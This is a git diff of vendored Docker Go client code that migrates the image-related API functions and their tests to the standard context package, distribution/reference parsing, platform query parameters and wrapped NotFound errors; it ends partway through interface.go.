func (cli *Client) ImageCreate(ctx context.Context, parentReference string, options types.ImageCreateOptions) (io.ReadCloser, error) { - repository, tag, err := reference.Parse(parentReference) + ref, err := reference.ParseNormalizedNamed(parentReference) if err != nil { return nil, err } query := url.Values{} - query.Set("fromImage", repository) - query.Set("tag", tag) + query.Set("fromImage", reference.FamiliarName(ref)) + query.Set("tag", getAPITagFromNamedRef(ref)) + if options.Platform != "" { + query.Set("platform", strings.ToLower(options.Platform)) + } resp, err := cli.tryImageCreate(ctx, query, options.RegistryAuth) if err != nil { return nil, err diff --git a/vendor/github.com/docker/docker/client/image_create_test.go b/vendor/github.com/docker/docker/client/image_create_test.go index 5c2edd2ad5..b89f16d27b 100644 --- a/vendor/github.com/docker/docker/client/image_create_test.go +++ b/vendor/github.com/docker/docker/client/image_create_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) diff --git a/vendor/github.com/docker/docker/client/image_history.go b/vendor/github.com/docker/docker/client/image_history.go index acb1ee9278..0151b9517f 100644 --- a/vendor/github.com/docker/docker/client/image_history.go +++ b/vendor/github.com/docker/docker/client/image_history.go @@ -1,16 +1,16 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" - "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/image" ) // ImageHistory returns the changes in an image in history format. 
-func (cli *Client) ImageHistory(ctx context.Context, imageID string) ([]types.ImageHistory, error) { - var history []types.ImageHistory +func (cli *Client) ImageHistory(ctx context.Context, imageID string) ([]image.HistoryResponseItem, error) { + var history []image.HistoryResponseItem serverResp, err := cli.get(ctx, "/images/"+imageID+"/history", url.Values{}, nil) if err != nil { return history, err diff --git a/vendor/github.com/docker/docker/client/image_history_test.go b/vendor/github.com/docker/docker/client/image_history_test.go index 729edb1ad5..0217bf575a 100644 --- a/vendor/github.com/docker/docker/client/image_history_test.go +++ b/vendor/github.com/docker/docker/client/image_history_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -9,8 +10,7 @@ import ( "strings" "testing" - "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/image" ) func TestImageHistoryError(t *testing.T) { @@ -30,7 +30,7 @@ func TestImageHistory(t *testing.T) { if !strings.HasPrefix(r.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) } - b, err := json.Marshal([]types.ImageHistory{ + b, err := json.Marshal([]image.HistoryResponseItem{ { ID: "image_id1", Tags: []string{"tag1", "tag2"}, diff --git a/vendor/github.com/docker/docker/client/image_import.go b/vendor/github.com/docker/docker/client/image_import.go index c6f154b249..c2972ea950 100644 --- a/vendor/github.com/docker/docker/client/image_import.go +++ b/vendor/github.com/docker/docker/client/image_import.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" - - "golang.org/x/net/context" + "strings" "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" @@ -15,7 +15,7 @@ import ( func (cli *Client) 
ImageImport(ctx context.Context, source types.ImageImportSource, ref string, options types.ImageImportOptions) (io.ReadCloser, error) { if ref != "" { //Check if the given image name can be resolved - if _, err := reference.ParseNamed(ref); err != nil { + if _, err := reference.ParseNormalizedNamed(ref); err != nil { return nil, err } } @@ -25,6 +25,9 @@ func (cli *Client) ImageImport(ctx context.Context, source types.ImageImportSour query.Set("repo", ref) query.Set("tag", options.Tag) query.Set("message", options.Message) + if options.Platform != "" { + query.Set("platform", strings.ToLower(options.Platform)) + } for _, change := range options.Changes { query.Add("changes", change) } diff --git a/vendor/github.com/docker/docker/client/image_import_test.go b/vendor/github.com/docker/docker/client/image_import_test.go index e309be74e6..944cd52fec 100644 --- a/vendor/github.com/docker/docker/client/image_import_test.go +++ b/vendor/github.com/docker/docker/client/image_import_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestImageImportError(t *testing.T) { @@ -37,7 +37,7 @@ func TestImageImport(t *testing.T) { } repo := query.Get("repo") if repo != "repository_name:imported" { - return nil, fmt.Errorf("repo not set in URL query properly. Expected 'repository_name', got %s", repo) + return nil, fmt.Errorf("repo not set in URL query properly. 
Expected 'repository_name:imported', got %s", repo) } tag := query.Get("tag") if tag != "imported" { diff --git a/vendor/github.com/docker/docker/client/image_inspect.go b/vendor/github.com/docker/docker/client/image_inspect.go index b3a64ce2f8..2f8f6d2f14 100644 --- a/vendor/github.com/docker/docker/client/image_inspect.go +++ b/vendor/github.com/docker/docker/client/image_inspect.go @@ -1,23 +1,22 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ImageInspectWithRaw returns the image information and its raw representation. func (cli *Client) ImageInspectWithRaw(ctx context.Context, imageID string) (types.ImageInspect, []byte, error) { + if imageID == "" { + return types.ImageInspect{}, nil, objectNotFoundError{object: "image", id: imageID} + } serverResp, err := cli.get(ctx, "/images/"+imageID+"/json", nil, nil) if err != nil { - if serverResp.statusCode == http.StatusNotFound { - return types.ImageInspect{}, nil, imageNotFoundError{imageID} - } - return types.ImageInspect{}, nil, err + return types.ImageInspect{}, nil, wrapResponseError(err, serverResp, "image", imageID) } defer ensureReaderClosed(serverResp) diff --git a/vendor/github.com/docker/docker/client/image_inspect_test.go b/vendor/github.com/docker/docker/client/image_inspect_test.go index 74a4e49805..a910872d1c 100644 --- a/vendor/github.com/docker/docker/client/image_inspect_test.go +++ b/vendor/github.com/docker/docker/client/image_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -11,7 +12,7 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func TestImageInspectError(t *testing.T) { @@ -31,11 +32,23 @@ func TestImageInspectImageNotFound(t 
*testing.T) { } _, _, err := client.ImageInspectWithRaw(context.Background(), "unknown") - if err == nil || !IsErrImageNotFound(err) { + if err == nil || !IsErrNotFound(err) { t.Fatalf("expected an imageNotFound error, got %v", err) } } +func TestImageInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.ImageInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) + } +} + func TestImageInspect(t *testing.T) { expectedURL := "/images/image_id/json" expectedTags := []string{"tag1", "tag2"} diff --git a/vendor/github.com/docker/docker/client/image_list.go b/vendor/github.com/docker/docker/client/image_list.go index f26464f67c..32fae27b37 100644 --- a/vendor/github.com/docker/docker/client/image_list.go +++ b/vendor/github.com/docker/docker/client/image_list.go @@ -1,13 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/versions" - "golang.org/x/net/context" ) // ImageList returns a list of images in the docker host. 
diff --git a/vendor/github.com/docker/docker/client/image_list_test.go b/vendor/github.com/docker/docker/client/image_list_test.go index 7c4a46414d..3ba5239a53 100644 --- a/vendor/github.com/docker/docker/client/image_list_test.go +++ b/vendor/github.com/docker/docker/client/image_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -11,7 +12,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) func TestImageListError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/image_load.go b/vendor/github.com/docker/docker/client/image_load.go index 77aaf1af36..91016e493c 100644 --- a/vendor/github.com/docker/docker/client/image_load.go +++ b/vendor/github.com/docker/docker/client/image_load.go @@ -1,11 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) diff --git a/vendor/github.com/docker/docker/client/image_load_test.go b/vendor/github.com/docker/docker/client/image_load_test.go index 68dc14ff22..116317da75 100644 --- a/vendor/github.com/docker/docker/client/image_load_test.go +++ b/vendor/github.com/docker/docker/client/image_load_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestImageLoadError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/image_prune.go b/vendor/github.com/docker/docker/client/image_prune.go index 5ef98b7f02..78ee3f6c49 100644 --- a/vendor/github.com/docker/docker/client/image_prune.go +++ b/vendor/github.com/docker/docker/client/image_prune.go @@ -1,12 +1,12 @@ -package client +package client // import 
"github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) // ImagesPrune requests the daemon to delete unused data diff --git a/vendor/github.com/docker/docker/client/image_prune_test.go b/vendor/github.com/docker/docker/client/image_prune_test.go new file mode 100644 index 0000000000..9b0839bb6c --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_prune_test.go @@ -0,0 +1,120 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestImagesPruneError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + } + + filters := filters.NewArgs() + + _, err := client.ImagesPrune(context.Background(), filters) + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) +} + +func TestImagesPrune(t *testing.T) { + expectedURL := "/v1.25/images/prune" + + danglingFilters := filters.NewArgs() + danglingFilters.Add("dangling", "true") + + noDanglingFilters := filters.NewArgs() + noDanglingFilters.Add("dangling", "false") + + labelFilters := filters.NewArgs() + labelFilters.Add("dangling", "true") + labelFilters.Add("label", "label1=foo") + labelFilters.Add("label", "label2!=bar") + + listCases := []struct { + filters filters.Args + expectedQueryParams map[string]string + }{ + { + filters: filters.Args{}, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": "", + }, + }, + { + filters: danglingFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true}}`, + }, + }, + { + 
filters: noDanglingFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"false":true}}`, + }, + }, + { + filters: labelFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true},"label":{"label1=foo":true,"label2!=bar":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + assert.Check(t, is.Equal(expected, actual)) + } + content, err := json.Marshal(types.ImagesPruneReport{ + ImagesDeleted: []types.ImageDeleteResponseItem{ + { + Deleted: "image_id1", + }, + { + Deleted: "image_id2", + }, + }, + SpaceReclaimed: 9999, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + version: "1.25", + } + + report, err := client.ImagesPrune(context.Background(), listCase.filters) + assert.Check(t, err) + assert.Check(t, is.Len(report.ImagesDeleted, 2)) + assert.Check(t, is.Equal(uint64(9999), report.SpaceReclaimed)) + } +} diff --git a/vendor/github.com/docker/docker/client/image_pull.go b/vendor/github.com/docker/docker/client/image_pull.go index 3bffdb70e8..d97aacf8c5 100644 --- a/vendor/github.com/docker/docker/client/image_pull.go +++ b/vendor/github.com/docker/docker/client/image_pull.go @@ -1,14 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/http" "net/url" + "strings" - "golang.org/x/net/context" - + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/reference" ) 
// ImagePull requests the docker host to pull an image from a remote registry. @@ -19,16 +19,19 @@ import ( // FIXME(vdemeester): there is currently used in a few way in docker/docker // - if not in trusted content, ref is used to pass the whole reference, and tag is empty // - if in trusted content, ref is used to pass the reference name, and tag for the digest -func (cli *Client) ImagePull(ctx context.Context, ref string, options types.ImagePullOptions) (io.ReadCloser, error) { - repository, tag, err := reference.Parse(ref) +func (cli *Client) ImagePull(ctx context.Context, refStr string, options types.ImagePullOptions) (io.ReadCloser, error) { + ref, err := reference.ParseNormalizedNamed(refStr) if err != nil { return nil, err } query := url.Values{} - query.Set("fromImage", repository) - if tag != "" && !options.All { - query.Set("tag", tag) + query.Set("fromImage", reference.FamiliarName(ref)) + if !options.All { + query.Set("tag", getAPITagFromNamedRef(ref)) + } + if options.Platform != "" { + query.Set("platform", strings.ToLower(options.Platform)) } resp, err := cli.tryImageCreate(ctx, query, options.RegistryAuth) @@ -44,3 +47,18 @@ func (cli *Client) ImagePull(ctx context.Context, ref string, options types.Imag } return resp.body, nil } + +// getAPITagFromNamedRef returns a tag from the specified reference. +// This function is necessary as long as the docker "server" api expects +// digests to be sent as tags and makes a distinction between the name +// and tag/digest part of a reference. 
+func getAPITagFromNamedRef(ref reference.Named) string { + if digested, ok := ref.(reference.Digested); ok { + return digested.Digest().String() + } + ref = reference.TagNameOnly(ref) + if tagged, ok := ref.(reference.Tagged); ok { + return tagged.Tag() + } + return "" +} diff --git a/vendor/github.com/docker/docker/client/image_pull_test.go b/vendor/github.com/docker/docker/client/image_pull_test.go index fe6bafed97..361c5c2be3 100644 --- a/vendor/github.com/docker/docker/client/image_pull_test.go +++ b/vendor/github.com/docker/docker/client/image_pull_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) @@ -21,7 +20,7 @@ func TestImagePullReferenceParseError(t *testing.T) { } // An empty reference is an invalid reference _, err := client.ImagePull(context.Background(), "", types.ImagePullOptions{}) - if err == nil || err.Error() != "repository name must have at least one component" { + if err == nil || !strings.Contains(err.Error(), "invalid reference format") { t.Fatalf("expected an error, got %v", err) } } diff --git a/vendor/github.com/docker/docker/client/image_push.go b/vendor/github.com/docker/docker/client/image_push.go index 8e73d28f56..a15871c2b4 100644 --- a/vendor/github.com/docker/docker/client/image_push.go +++ b/vendor/github.com/docker/docker/client/image_push.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "errors" "io" "net/http" "net/url" - "golang.org/x/net/context" - - distreference "github.com/docker/distribution/reference" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" ) @@ -16,31 +15,33 @@ import ( // It executes the privileged function if the operation is unauthorized // and it tries one more time. 
// It's up to the caller to handle the io.ReadCloser and close it properly. -func (cli *Client) ImagePush(ctx context.Context, ref string, options types.ImagePushOptions) (io.ReadCloser, error) { - distributionRef, err := distreference.ParseNamed(ref) +func (cli *Client) ImagePush(ctx context.Context, image string, options types.ImagePushOptions) (io.ReadCloser, error) { + ref, err := reference.ParseNormalizedNamed(image) if err != nil { return nil, err } - if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical { + if _, isCanonical := ref.(reference.Canonical); isCanonical { return nil, errors.New("cannot push a digest reference") } - var tag = "" - if nameTaggedRef, isNamedTagged := distributionRef.(distreference.NamedTagged); isNamedTagged { + tag := "" + name := reference.FamiliarName(ref) + + if nameTaggedRef, isNamedTagged := ref.(reference.NamedTagged); isNamedTagged { tag = nameTaggedRef.Tag() } query := url.Values{} query.Set("tag", tag) - resp, err := cli.tryImagePush(ctx, distributionRef.Name(), query, options.RegistryAuth) + resp, err := cli.tryImagePush(ctx, name, query, options.RegistryAuth) if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil { newAuthHeader, privilegeErr := options.PrivilegeFunc() if privilegeErr != nil { return nil, privilegeErr } - resp, err = cli.tryImagePush(ctx, distributionRef.Name(), query, newAuthHeader) + resp, err = cli.tryImagePush(ctx, name, query, newAuthHeader) } if err != nil { return nil, err diff --git a/vendor/github.com/docker/docker/client/image_push_test.go b/vendor/github.com/docker/docker/client/image_push_test.go index b52da8b8dc..0693601af1 100644 --- a/vendor/github.com/docker/docker/client/image_push_test.go +++ b/vendor/github.com/docker/docker/client/image_push_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - 
"golang.org/x/net/context" - "github.com/docker/docker/api/types" ) @@ -21,7 +20,7 @@ func TestImagePushReferenceError(t *testing.T) { } // An empty reference is an invalid reference _, err := client.ImagePush(context.Background(), "", types.ImagePushOptions{}) - if err == nil || err.Error() != "repository name must have at least one component" { + if err == nil || !strings.Contains(err.Error(), "invalid reference format") { t.Fatalf("expected an error, got %v", err) } // An canonical reference cannot be pushed diff --git a/vendor/github.com/docker/docker/client/image_remove.go b/vendor/github.com/docker/docker/client/image_remove.go index 839e5311c4..45d6e6f0db 100644 --- a/vendor/github.com/docker/docker/client/image_remove.go +++ b/vendor/github.com/docker/docker/client/image_remove.go @@ -1,15 +1,15 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ImageRemove removes an image from the docker host. 
-func (cli *Client) ImageRemove(ctx context.Context, imageID string, options types.ImageRemoveOptions) ([]types.ImageDelete, error) { +func (cli *Client) ImageRemove(ctx context.Context, imageID string, options types.ImageRemoveOptions) ([]types.ImageDeleteResponseItem, error) { query := url.Values{} if options.Force { @@ -19,12 +19,12 @@ func (cli *Client) ImageRemove(ctx context.Context, imageID string, options type query.Set("noprune", "1") } + var dels []types.ImageDeleteResponseItem resp, err := cli.delete(ctx, "/images/"+imageID, query, nil) if err != nil { - return nil, err + return dels, wrapResponseError(err, resp, "image", imageID) } - var dels []types.ImageDelete err = json.NewDecoder(resp.body).Decode(&dels) ensureReaderClosed(resp) return dels, err diff --git a/vendor/github.com/docker/docker/client/image_remove_test.go b/vendor/github.com/docker/docker/client/image_remove_test.go index 7b004f70e6..acc6bc9177 100644 --- a/vendor/github.com/docker/docker/client/image_remove_test.go +++ b/vendor/github.com/docker/docker/client/image_remove_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,8 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestImageRemoveError(t *testing.T) { @@ -19,9 +21,17 @@ func TestImageRemoveError(t *testing.T) { } _, err := client.ImageRemove(context.Background(), "image_id", types.ImageRemoveOptions{}) - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) +} + +func TestImageRemoveImageNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "missing")), } + + _, err := client.ImageRemove(context.Background(), 
"unknown", types.ImageRemoveOptions{}) + assert.Check(t, is.Error(err, "Error: No such image: unknown")) + assert.Check(t, IsErrNotFound(err)) } func TestImageRemove(t *testing.T) { @@ -63,7 +73,7 @@ func TestImageRemove(t *testing.T) { return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) } } - b, err := json.Marshal([]types.ImageDelete{ + b, err := json.Marshal([]types.ImageDeleteResponseItem{ { Untagged: "image_id1", }, diff --git a/vendor/github.com/docker/docker/client/image_save.go b/vendor/github.com/docker/docker/client/image_save.go index ecac880a32..d1314e4b22 100644 --- a/vendor/github.com/docker/docker/client/image_save.go +++ b/vendor/github.com/docker/docker/client/image_save.go @@ -1,10 +1,9 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" - - "golang.org/x/net/context" ) // ImageSave retrieves one or more images from the docker host as an io.ReadCloser. diff --git a/vendor/github.com/docker/docker/client/image_save_test.go b/vendor/github.com/docker/docker/client/image_save_test.go index 8f0cf88640..a40055e583 100644 --- a/vendor/github.com/docker/docker/client/image_save_test.go +++ b/vendor/github.com/docker/docker/client/image_save_test.go @@ -1,16 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "reflect" - "testing" - - "golang.org/x/net/context" - "strings" + "testing" ) func TestImageSaveError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/image_search.go b/vendor/github.com/docker/docker/client/image_search.go index b0fcd5c23d..176de3c582 100644 --- a/vendor/github.com/docker/docker/client/image_search.go +++ b/vendor/github.com/docker/docker/client/image_search.go @@ -1,6 +1,7 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "net/http" @@ 
-9,7 +10,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/registry" - "golang.org/x/net/context" ) // ImageSearch makes the docker host to search by a term in a remote registry. @@ -21,7 +21,7 @@ func (cli *Client) ImageSearch(ctx context.Context, term string, options types.I query.Set("limit", fmt.Sprintf("%d", options.Limit)) if options.Filters.Len() > 0 { - filterJSON, err := filters.ToParam(options.Filters) + filterJSON, err := filters.ToJSON(options.Filters) if err != nil { return results, err } diff --git a/vendor/github.com/docker/docker/client/image_search_test.go b/vendor/github.com/docker/docker/client/image_search_test.go index b17bbd8343..1456cd606f 100644 --- a/vendor/github.com/docker/docker/client/image_search_test.go +++ b/vendor/github.com/docker/docker/client/image_search_test.go @@ -1,16 +1,15 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" + "encoding/json" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - - "encoding/json" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/registry" diff --git a/vendor/github.com/docker/docker/client/image_tag.go b/vendor/github.com/docker/docker/client/image_tag.go index bdbf94add2..5652bfc252 100644 --- a/vendor/github.com/docker/docker/client/image_tag.go +++ b/vendor/github.com/docker/docker/client/image_tag.go @@ -1,34 +1,37 @@ -package client +package client // import "github.com/docker/docker/client" import ( - "errors" - "fmt" + "context" "net/url" - "golang.org/x/net/context" - - distreference "github.com/docker/distribution/reference" - "github.com/docker/docker/api/types/reference" + "github.com/docker/distribution/reference" + "github.com/pkg/errors" ) // ImageTag tags an image in the docker host -func (cli *Client) ImageTag(ctx context.Context, imageID, ref 
string) error { - distributionRef, err := distreference.ParseNamed(ref) +func (cli *Client) ImageTag(ctx context.Context, source, target string) error { + if _, err := reference.ParseAnyReference(source); err != nil { + return errors.Wrapf(err, "Error parsing reference: %q is not a valid repository/tag", source) + } + + ref, err := reference.ParseNormalizedNamed(target) if err != nil { - return fmt.Errorf("Error parsing reference: %q is not a valid repository/tag", ref) + return errors.Wrapf(err, "Error parsing reference: %q is not a valid repository/tag", target) } - if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical { + if _, isCanonical := ref.(reference.Canonical); isCanonical { return errors.New("refusing to create a tag with a digest reference") } - tag := reference.GetTagFromNamedRef(distributionRef) + ref = reference.TagNameOnly(ref) query := url.Values{} - query.Set("repo", distributionRef.Name()) - query.Set("tag", tag) + query.Set("repo", reference.FamiliarName(ref)) + if tagged, ok := ref.(reference.Tagged); ok { + query.Set("tag", tagged.Tag()) + } - resp, err := cli.post(ctx, "/images/"+imageID+"/tag", query, nil, nil) + resp, err := cli.post(ctx, "/images/"+source+"/tag", query, nil, nil) ensureReaderClosed(resp) return err } diff --git a/vendor/github.com/docker/docker/client/image_tag_test.go b/vendor/github.com/docker/docker/client/image_tag_test.go index 7925db9f1b..2923bb995b 100644 --- a/vendor/github.com/docker/docker/client/image_tag_test.go +++ b/vendor/github.com/docker/docker/client/image_tag_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestImageTagError(t *testing.T) { @@ -22,7 +21,7 @@ func TestImageTagError(t *testing.T) { } } -// Note: this is not testing all the InvalidReference as it's the reponsability +// Note: this is not testing all 
the InvalidReference as it's the responsibility // of distribution/reference package. func TestImageTagInvalidReference(t *testing.T) { client := &Client{ @@ -30,11 +29,33 @@ func TestImageTagInvalidReference(t *testing.T) { } err := client.ImageTag(context.Background(), "image_id", "aa/asdf$$^/aa") - if err == nil || err.Error() != `Error parsing reference: "aa/asdf$$^/aa" is not a valid repository/tag` { + if err == nil || err.Error() != `Error parsing reference: "aa/asdf$$^/aa" is not a valid repository/tag: invalid reference format` { t.Fatalf("expected ErrReferenceInvalidFormat, got %v", err) } } +func TestImageTagInvalidSourceImageName(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.ImageTag(context.Background(), "invalid_source_image_name_", "repo:tag") + if err == nil || err.Error() != "Error parsing reference: \"invalid_source_image_name_\" is not a valid repository/tag: invalid reference format" { + t.Fatalf("expected Parsing Reference Error, got %v", err) + } +} + +func TestImageTagHexSource(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusOK, "OK")), + } + + err := client.ImageTag(context.Background(), "0d409d33b27e47423b049f7f863faa08655a8c901749c2b25b93ca67d01a470d", "repo:tag") + if err != nil { + t.Fatalf("got error: %v", err) + } +} + func TestImageTag(t *testing.T) { expectedURL := "/images/image_id/tag" tagCases := []struct { diff --git a/vendor/github.com/docker/docker/client/info.go b/vendor/github.com/docker/docker/client/info.go index ac07961224..121f256ab1 100644 --- a/vendor/github.com/docker/docker/client/info.go +++ b/vendor/github.com/docker/docker/client/info.go @@ -1,12 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // Info returns information about the 
docker server. diff --git a/vendor/github.com/docker/docker/client/info_test.go b/vendor/github.com/docker/docker/client/info_test.go index 79f23c8af2..866d8e8849 100644 --- a/vendor/github.com/docker/docker/client/info_test.go +++ b/vendor/github.com/docker/docker/client/info_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestInfoServerError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/interface.go b/vendor/github.com/docker/docker/client/interface.go index 05978039b7..9250c468a6 100644 --- a/vendor/github.com/docker/docker/client/interface.go +++ b/vendor/github.com/docker/docker/client/interface.go @@ -1,23 +1,28 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" + "net" + "net/http" "time" "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/container" + containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/events" "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/image" + networktypes "github.com/docker/docker/api/types/network" "github.com/docker/docker/api/types/registry" "github.com/docker/docker/api/types/swarm" volumetypes "github.com/docker/docker/api/types/volume" - "golang.org/x/net/context" ) // CommonAPIClient is the common methods between stable and experimental versions of APIClient. 
type CommonAPIClient interface { + ConfigAPIClient ContainerAPIClient + DistributionAPIClient ImageAPIClient NodeAPIClient NetworkAPIClient @@ -28,17 +33,22 @@ type CommonAPIClient interface { SystemAPIClient VolumeAPIClient ClientVersion() string + DaemonHost() string + HTTPClient() *http.Client ServerVersion(ctx context.Context) (types.Version, error) - UpdateClientVersion(v string) + NegotiateAPIVersion(ctx context.Context) + NegotiateAPIVersionPing(types.Ping) + DialSession(ctx context.Context, proto string, meta map[string][]string) (net.Conn, error) + Close() error } // ContainerAPIClient defines API client methods for the containers type ContainerAPIClient interface { ContainerAttach(ctx context.Context, container string, options types.ContainerAttachOptions) (types.HijackedResponse, error) ContainerCommit(ctx context.Context, container string, options types.ContainerCommitOptions) (types.IDResponse, error) - ContainerCreate(ctx context.Context, config *container.Config, hostConfig *container.HostConfig, networkingConfig *network.NetworkingConfig, containerName string) (container.ContainerCreateCreatedBody, error) - ContainerDiff(ctx context.Context, container string) ([]types.ContainerChange, error) - ContainerExecAttach(ctx context.Context, execID string, config types.ExecConfig) (types.HijackedResponse, error) + ContainerCreate(ctx context.Context, config *containertypes.Config, hostConfig *containertypes.HostConfig, networkingConfig *networktypes.NetworkingConfig, containerName string) (containertypes.ContainerCreateCreatedBody, error) + ContainerDiff(ctx context.Context, container string) ([]containertypes.ContainerChangeResponseItem, error) + ContainerExecAttach(ctx context.Context, execID string, config types.ExecStartCheck) (types.HijackedResponse, error) ContainerExecCreate(ctx context.Context, container string, config types.ExecConfig) (types.IDResponse, error) ContainerExecInspect(ctx context.Context, execID string) 